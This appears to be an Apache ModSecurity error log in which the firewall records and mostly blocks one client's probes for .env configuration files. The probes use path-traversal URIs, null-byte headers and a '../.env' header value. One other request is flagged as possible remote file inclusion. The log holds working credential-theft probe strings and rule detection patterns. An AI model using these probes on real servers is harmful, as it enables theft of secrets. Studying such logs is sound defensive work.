[Tue May 12 05:23:03.637847 2026] [security2:error] [pid 1825287:tid 1825308] [client 45.148.10.238:60886] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdAAgpmE1yW0glLdgsVwAAAMM"]
[Tue May 12 05:23:03.639572 2026] [security2:error] [pid 1844863:tid 1844884] [client 45.148.10.238:29760] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc4PaAnTZtx1_H_wy1NgAAAU8"]
[Tue May 12 05:23:03.732172 2026] [security2:error] [pid 1842385:tid 1842409] [client 45.148.10.238:29802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc4Bs7kySIUZ3ORnIkhAAAARI"]
[Tue May 12 05:23:03.777079 2026] [security2:error] [pid 1844863:tid 1844885] [client 45.148.10.238:29856] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc5PaAnTZtx1_H_wy1OQAAAVA"]
[Tue May 12 05:23:05.558145 2026] [security2:error] [pid 1825179:tid 1825221] [client 45.148.10.238:60856] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdANr1yOh9TvizezidqAAAAFc"]
[Tue May 12 05:23:06.100093 2026] [security2:error] [pid 1820198:tid 1820201] [client 45.148.10.238:22096] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc781tk6y7yBJLpJo4CwAAAIE"]
[Tue May 12 05:23:06.124013 2026] [security2:error] [pid 1825287:tid 1825305] [client 45.148.10.238:57322] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1"] [unique_id "agKdGggpmE1yW0glLdgsbwAAAME"]
[Tue May 12 05:23:06.124068 2026] [security2:error] [pid 1825287:tid 1825305] [client 45.148.10.238:57322] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1"] [unique_id "agKdGggpmE1yW0glLdgsbwAAAME"]
[Tue May 12 05:23:06.124096 2026] [security2:error] [pid 1825287:tid 1825305] [client 45.148.10.238:57322] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1"] [unique_id "agKdGggpmE1yW0glLdgsbwAAAME"]
[Tue May 12 05:23:06.124299 2026] [security2:error] [pid 1825287:tid 1825305] [client 45.148.10.238:57322] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1"] [unique_id "agKdGggpmE1yW0glLdgsbwAAAME"]
[Tue May 12 05:23:06.124336 2026] [security2:error] [pid 1825287:tid 1825305] [client 45.148.10.238:57322] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1"] [unique_id "agKdGggpmE1yW0glLdgsbwAAAME"]
[Tue May 12 05:23:06.124726 2026] [security2:error] [pid 1825287:tid 1825305] [client 45.148.10.238:57322] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 22)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1"] [unique_id "agKdGggpmE1yW0glLdgsbwAAAME"]
[Tue May 12 05:23:06.132324 2026] [security2:error] [pid 1844863:tid 1844877] [client 45.148.10.238:57312] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env.example"] [unique_id "agKdGvaAnTZtx1_H_wy1eAAAAUg"]
[Tue May 12 05:23:06.132535 2026] [security2:error] [pid 1844863:tid 1844877] [client 45.148.10.238:57312] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env.example"] [unique_id "agKdGvaAnTZtx1_H_wy1eAAAAUg"]
[Tue May 12 05:23:06.139473 2026] [security2:error] [pid 1808852:tid 1808879] [client 45.148.10.238:57320] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKdGhfeipD4uoG21FovIAAAABg"]
[Tue May 12 05:23:06.139582 2026] [security2:error] [pid 1808852:tid 1808879] [client 45.148.10.238:57320] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKdGhfeipD4uoG21FovIAAAABg"]
[Tue May 12 05:23:06.139758 2026] [security2:error] [pid 1808852:tid 1808879] [client 45.148.10.238:57320] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKdGhfeipD4uoG21FovIAAAABg"]
[Tue May 12 05:23:06.233046 2026] [security2:error] [pid 1825287:tid 1825318] [client 45.148.10.238:22030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc6wgpmE1yW0glLdgsTAAAAM0"]
[Tue May 12 05:23:07.976827 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.238:19788] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdBAgpmE1yW0glLdgsXwAAANg"]
[Tue May 12 05:23:08.069024 2026] [security2:error] [pid 1808852:tid 1808863] [client 45.148.10.238:33228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdDxfeipD4uoG21FovDAAAAAg"]
[Tue May 12 05:23:09.508180 2026] [security2:error] [pid 1825287:tid 1825321] [client 45.148.10.238:57336] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1"] [unique_id "agKdHQgpmE1yW0glLdgscAAAANA"]
[Tue May 12 05:23:09.508237 2026] [security2:error] [pid 1825287:tid 1825321] [client 45.148.10.238:57336] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1"] [unique_id "agKdHQgpmE1yW0glLdgscAAAANA"]
[Tue May 12 05:23:09.508264 2026] [security2:error] [pid 1825287:tid 1825321] [client 45.148.10.238:57336] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1"] [unique_id "agKdHQgpmE1yW0glLdgscAAAANA"]
[Tue May 12 05:23:09.508852 2026] [security2:error] [pid 1825287:tid 1825321] [client 45.148.10.238:57336] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 12)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1"] [unique_id "agKdHQgpmE1yW0glLdgscAAAANA"]
[Tue May 12 05:23:09.518652 2026] [core:error] [pid 1820198:tid 1820224] [client 45.148.10.238:57364] AH10244: invalid URI path (/css../../../.env)
[Tue May 12 05:23:09.522595 2026] [security2:error] [pid 1825179:tid 1825201] [client 45.148.10.238:57348] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/app/.env"] [unique_id "agKdHdr1yOh9TvizezidywAAAEM"]
[Tue May 12 05:23:09.522800 2026] [security2:error] [pid 1825179:tid 1825201] [client 45.148.10.238:57348] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/app/.env"] [unique_id "agKdHdr1yOh9TvizezidywAAAEM"]
[Tue May 12 05:23:09.591861 2026] [security2:error] [pid 1842385:tid 1842393] [client 45.148.10.238:60934] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc-Rs7kySIUZ3ORnIkrAAAAQM"]
[Tue May 12 05:23:10.870228 2026] [security2:error] [pid 1820198:tid 1820221] [client 45.148.10.238:60896] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc9c1tk6y7yBJLpJo4FQAAAJU"]
[Tue May 12 05:23:12.666771 2026] [core:error] [pid 1842385:tid 1842405] [client 45.148.10.238:57380] AH10244: invalid URI path (/css../../../../.env)
[Tue May 12 05:23:12.668856 2026] [core:error] [pid 1808852:tid 1808875] [client 45.148.10.238:57394] AH10244: invalid URI path (/../../.env)
[Tue May 12 05:23:12.669390 2026] [security2:error] [pid 1844863:tid 1844881] [client 45.148.10.238:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/var/www/.env"] [unique_id "agKdIPaAnTZtx1_H_wy1fQAAAUw"]
[Tue May 12 05:23:12.669608 2026] [security2:error] [pid 1844863:tid 1844881] [client 45.148.10.238:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/var/www/.env"] [unique_id "agKdIPaAnTZtx1_H_wy1fQAAAUw"]
[Tue May 12 05:23:13.282049 2026] [security2:error] [pid 1825179:tid 1825197] [client 45.148.10.238:33268] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdF9r1yOh9TvizezidxwAAAEA"]
[Tue May 12 05:23:15.859321 2026] [security2:error] [pid 1844863:tid 1844874] [client 45.148.10.238:60952] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 12 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc-faAnTZtx1_H_wy1VQAAAUU"]
[Tue May 12 05:23:16.481023 2026] [security2:error] [pid 1825179:tid 1825219] [client 54.156.124.2:19886] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://212.68.200.99 found within ARGS:url: http://212.68.200.99:9673/mseal/services"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKdJNr1yOh9Tvizezid2AAAAFU"]
[Tue May 12 05:23:16.481538 2026] [security2:error] [pid 1825179:tid 1825219] [client 54.156.124.2:19886] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKdJNr1yOh9Tvizezid2AAAAFU"]
[Tue May 12 05:23:16.481791 2026] [security2:error] [pid 1825179:tid 1825219] [client 54.156.124.2:19886] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKdJNr1yOh9Tvizezid2AAAAFU"]
[Tue May 12 05:23:17.174165 2026] [security2:error] [pid 1844863:tid 1844885] [client 45.148.10.238:28566] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKdJfaAnTZtx1_H_wy1jAAAAVA"]
[Tue May 12 05:23:17.174251 2026] [security2:error] [pid 1844863:tid 1844885] [client 45.148.10.238:28566] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKdJfaAnTZtx1_H_wy1jAAAAVA"]
[Tue May 12 05:23:17.174424 2026] [security2:error] [pid 1844863:tid 1844885] [client 45.148.10.238:28566] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKdJfaAnTZtx1_H_wy1jAAAAVA"]
[Tue May 12 05:23:17.186395 2026] [core:error] [pid 1825179:tid 1825206] [client 45.148.10.238:28580] AH10244: invalid URI path (/../.env)
